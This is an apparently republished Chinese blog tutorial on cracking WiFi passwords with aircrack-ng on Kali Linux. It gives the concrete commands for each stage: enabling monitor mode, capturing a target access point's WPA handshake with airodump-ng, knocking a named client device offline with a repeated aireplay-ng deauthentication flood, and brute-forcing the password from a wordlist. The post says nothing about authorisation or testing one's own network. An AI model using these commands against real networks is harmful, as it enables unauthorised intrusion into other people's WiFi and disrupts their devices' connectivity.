前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >基于传统的WiFi密码破解

基于传统的WiFi密码破解

作者头像
逍遥子大表哥
发布2021-12-17 12:32:47
2.8K5
发布2021-12-17 12:32:47
举报
文章被收录于专栏:kali blog

一:准备

1.开始前,先连上无线网卡,因为虚拟机中的kali系统不用调用笔记本自带的无线网卡,所以需要一个外接无线网卡,然后接入kali系统。

2.输入 ifconfig -a 查看网卡,多了个 wlan0说明网卡已经适配好,不然可能是驱动有问题。

3.开启monitor模式,这里有些进程会影响到monitor模式的开启,如果开启成功可忽略,不然就依提示操作。

4.按提示操作的结果:

5.监听网络,完了 Ctrl+C 退出。

6.主要参数说明:

代码语言:javascript
复制
#BSSID :路由器、AP的MAC地址<p></p>
<p style="line-height: 30px; text-indent: 2em;">#PWR :信号强度,一看就是越小越强了</p>
<p style="line-height: 30px; text-indent: 2em;">##Data :传输的数据大小,大的可能在下载或看视频什么的</p>
<p style="line-height: 30px; text-indent: 2em;">#CH      :无线信道,要看准</p>
<p style="line-height: 30px; text-indent: 2em;">#ENC    :加密协议,自WPA2协议爆出重大安全漏洞,现已经出WPA3,坐等更新</p>
<p style="line-height: 30px; text-indent: 2em;">#ESSID  :这个就不用多说了,wifi名称,有中文可能会出现乱码哈</p>

7.目标有了,开始对其进行cap包的监听和获取,这里要让其中连接的设备重连才能抓包其握手包,可以慢慢等待,也可以使用deauth洪水攻击。

代码语言:javascript
复制
root@huan:~#airodump-ng -c 9 --bssid 78:11:DC:10:4F:66 -w /root/桌面/wuxianpj/handshake/wlan0mon

// -w 后面的路径是存放握手包的

  1. 另起窗口,我们用deauth洪水攻击,让其中的一台设备掉线,它掉线后会自动连接(除非别人在wifi设置中勾选掉了自动连接)
代码语言:javascript
复制
root@huan:~#aireplay-ng -0 20 -c 6C:88:14:F2:47:8C -a 78:11:DC:10:4F:66 wlan0mon

// -0 death模式,20为攻击次数,也可以设为0,就是一直攻击

// -c 这里自然就是连接上的某台设备的MAC地址了,指定它,我们让它稳稳地掉线

9.获取握手包

10.话不多说,上字典(关键东西),让它慢慢破去吧

代码语言:javascript
复制
root@huan:~#aircrack-ng -w /root/桌面/wuxianpj/zidian/wordlist.txt /root/桌面/wuxianpj/handshake/-02.cap

版权属于:逍遥子大表哥

本文链接:https://cloud.tencent.com/developer/article/1920469

按照知识共享署名-非商业性使用 4.0 国际协议进行许可,转载引用文章应遵循相同协议。

本文参与 腾讯云自媒体同步曝光计划,分享自作者个人站点/博客。
如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 作者个人站点/博客 前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • 一:准备
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档